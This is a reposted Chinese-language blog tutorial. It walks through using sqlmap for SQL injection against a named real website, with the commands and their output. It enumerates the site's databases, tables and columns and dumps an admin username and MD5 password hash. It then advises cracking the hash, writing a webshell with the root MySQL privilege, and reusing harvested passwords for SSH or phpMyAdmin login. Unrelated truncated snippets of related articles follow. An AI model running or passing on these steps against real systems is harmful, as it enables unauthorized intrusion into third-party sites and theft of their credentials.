2. 程式人生 > >sqlmap進行mysql注入root許可權讀寫檔案

sqlmap進行mysql注入root許可權讀寫檔案

阿新 發佈:2019-02-12

  1.在BT5 R2下[email protected]:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 -f -b --current-user --current-db -v 1 /*獲取當前使用者和當前資料庫

  返回結果 :

  [02:42:20] [INFO] fetching current user current user: '[email protected]' [02:42:21]

  [INFO] fetching current database current database: 'wepost'

  //當前使用者為 root 當前資料庫為 wepost

  [email protected]:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbs -v 2

  //獲取所有資料庫 返回結果 : available databases [8]: [*] bb [*] cart [*] information_schema [*] mysql [*] taipotour [*] test [*] wepost [*] wepost2 看結果可以也可以知道 當前存在8個數據庫

  [email protected]

:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --tables -D wepost -v 2

  //獲取wepost資料庫(也就是當前資料庫)的所有表名 返回結果 : Database: wepost [6 tables]| admin | | article | | contributor | | idea | | image | | issue |看結果可以也可以知道 存在6個表

  [email protected]:/pentest/database/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --columns -D wepost -T admin -v 2

  //獲取wepost資料庫裡admin表的欄位 返回結果 : Database: wepost Table: admin [4 columns]|id|int(11)|password|varchar(32)|type|varchar(10)|userid|varchar(20)看結果可以也可以知道 存在4個欄位

  [email protected]:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dump -D "wepost" -T "admin" -C "userid,password" -s "sqlnmapdb.log" -v -v 2

  //獲取wepost資料庫裡 admin表裡 userid和password欄位裡面的內容 並將資料儲存下來 /pentest/database/sqlmap/output/www.wepost.com.hk 返回結果 : Database: wepost Table: admin [1 entry]| password | userid | |7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |

  [03:08:51] [INFO] Table 'wepost.admin' dumped to CSV file '/pentest/database/sqlmap/output/www.wepost.com.hk/dump/wepost/admin.csv'

  [03:08:51] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.wepost.com.hk'

  //得到帳號密碼|7d4d7589db8b28e04db0982dd0e92189|wepost2010|破MD5找後臺去吧。。。

  // mysql既然是root許可權 當然可以試著寫shell或者讀檔案 (一般讀都是讀apache配置檔案找網站路徑 網站配置檔案獲取root密碼嘗試社工直接登入linux的ssh或者登入phpmyadmin登入執行sql語句寫shell 或者讀其他銘感資訊) root許可權寫shell的3個條件:

相關推薦

sqlmap進行mysql注入root許可權檔案

  1.在BT5 R2下[email protected]:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 -f -b --current-user --curren

Hadoop程式執行中 “沒有許可權檔案

問題:在hdfs與本地檔案系統進行檔案讀寫的時候顯示許可權不夠 解決: 1、hdfs中的檔案許可權不夠        檢視hdfs檔案許可權,通過 hadoop fs -chmod 777 XXXX 進行許可權的修改 2、本地(Linux)檔案許可權不夠      

解決Mac下使用root 許可權依舊無法檔案的問題

當時在學習selenium的時候,需要配合使用chromedriver 和phantomjs 進行瀏覽器的自動化測試..  chromedriver下載結束後。無法移動到/user/bin下面 會提示許可權不夠,可明明是root,使用者,居然也許可權不夠??? 提示Operation not

mysql 主從實戰及分離

logs 啟動 毫秒 class -- systemctl position 讀寫 mas 1. MYSQL主從原理    1) 至少需要2臺數據庫服務器,一主一從,Master開啟bin-log功能用於記錄主庫增加、刪除、修改、更新SQL語句。   2) 異步復

mysql主從復制分離

mysql主從 mysql讀寫分離 mysql主從復制讀寫分離一、MYSQL讀寫分離的概述Mysql作為目前世界上使用最廣泛的免費數據庫,相信所有從事系統運維的工程師都一定接觸過。但在實際的生產環境中,由單臺Mysql作為獨立的數據庫是完全不能滿足實際需求的,無論是在安全性,高可用性以及高並發等各個方

mysql主從配置,分離

忽略 數據緩存 get 抓狂 mysql主從配置 sudo ignore win8.1 這不 Mysql主從配置,實現讀寫分離 大型網站為了軟解大量的並發訪問,除了在網站實現分布式負載均衡,遠遠不夠。到了數據業務層、數據訪問層,如果還是傳統的數據結構,或者只是單單靠一

48.MYSQL的主從與分離

linuxlinux企業級知識點總結Mysql主從復制與讀寫分離原理圖 Mysql的主從復制:從服務器在主服務器上自動同步數據。Mysql的讀寫分離:通過amoeba服務器控制用戶讀數據在從服務器上進行,寫數據從主服務器上進行,這樣可以做到負載均衡。 搭建mysql主從復制:v 建立時間同步環境#yum -y

java實現mysql數據庫分離之定義多數據源方式

修改 protect frame auto ret 更新數據 logs cannot initial 該示例是基於spring提供的AbstractRoutingDataSource,實現了一個動態數據源的功能,在spring配置中定義多個數據庫分為主、從數據庫,實現效

Mysql DBA 高級運維學習筆記-生產場景mysql主從復制分離授權方案及實戰

pin 同時 row rpo from 可能 change sql sla 當配置好MySQL主從復制以後所有對數據內容的更新就必須在主庫上進行。那麽為什麽所有的更新都要在主服務器上進行呢?這是因為數據復制時單向的,只有在主庫上更新,才能避免用戶對主服務器上數據庫內容的更新

MySQL主從同步與分離

修改配置 monit 相關 流量 修改配置文件 l數據庫 cli 授權 san MySQL主從同步MySQL AB復制1.對指定庫的異地同步。2.MySQL主-->從復制架構的實現。3.MySQL服務器的只讀控制。 主從:單向復制時,建議將從庫設置為只讀。 主從復制

mysql主從復制分離與高可用配置

mysql主從復制 mysql讀寫分離 一、說明 前面我們說了mysql的安裝配置(並提供一鍵安裝腳本),mysql語句使用以及備份恢復mysql數據;本次要介紹的是mysql的主從復制,讀寫分離;及高可用MHA;環境如下:master:CentOS7_x64 mysql5.721 172.16.

Mysql使用ProxySQL實現分離

mysql讀寫分離 讀寫分離 proxysql proxysql讀寫分離 mysql proxysql ProxySQL簡介: ProxySQL是一個高性能的MySQL中間件,擁有強大的規則引擎。 詳細的中文介紹:別人寫的,基本跟官方無差別 官方文檔:https://github.c

【純幹貨】Amoeba實現MySQL主從同步與分離

exec strong arc all abstract a star status utf prop 【純幹貨】Amoeba實現MySQL主從同步與讀寫分離 一、簡介 amoeba簡介 Amoeba(變形蟲)項目,該開源框架於2008年開始發布一款 Amoeba f

Mycat實現Mysql數據庫分離

測試 9.png http company 分片 col windows版本 更多 win Linux和Windows環境下搭建Mycat數據讀寫分離 前提需要:1.服務器裝有JVM虛擬機,就是JDK。2.兩個Mysql數據庫已經實現主從復制,參考:https://

【實戰】Amoeba 代理 MySQL 主從復制 + 分離 【提供源碼包】

system 導數據 ant 代理服 數據庫實例 切分 creat 生效 啟動服務 目錄簡介: 1· Amoeba 的介紹2· MySQL 主從復制原理3· MySQL 讀寫分離原理4· 實戰案例5· 總結歸納 Amoeba 的介紹 1)Amoeba 是什麽: 1

MySQL主從分割槽和分離

MySQL主從分割槽、讀寫分離、負載均衡 一個MySQL的伺服器的承載連線的數量是有限的,當超出最大連線數之後,MySQL伺服器就會出現異常或者宕機。 再者,伺服器也可能會壞掉(比如硬碟壞了),這時資料會丟失,所以我們需要考慮資料庫的主從分割槽。 一般大型網站都是讀多寫少,實現讀寫分

Python3.5開發3 - 基本命令及如何進行檔案

Python3.5開發3 - 基本命令及如何進行讀寫檔案 知識點: 熟練使用Python的列表,元組,集合與字典 熟練使用Python讀寫檔案 演示: # list a = [1,'yx',['x','y'],6]

mysql-8.0.12分離

安裝包下載地址:https://downloads.mysql.com/archives/proxy/   環境 proxy:172.16.1.20 master:172.16.1.21 slave1:172.16.1.22 slave2:172.16.1.23   本文選

[實戰]使用SQLmap進行SQL注入

一、什麼是SQLmap? SQLmap是一款用來檢測與利用SQL注入漏洞的免費開源工具,有一個非常棒的特性,即對檢測與利用的自動化處理(資料庫指紋、訪問底層檔案系統、執行命令)。 備註:SQLmap是python程式碼 二、SQL注入

mysql主從 、Mycat分離、haproxy高可用

Mysql 遷移流程   核心原則,不能影響線上的服務   原 mysql 開啟 binlog 配置 my.cnf server-id       = 11 log_bin         = mysql-bin binlog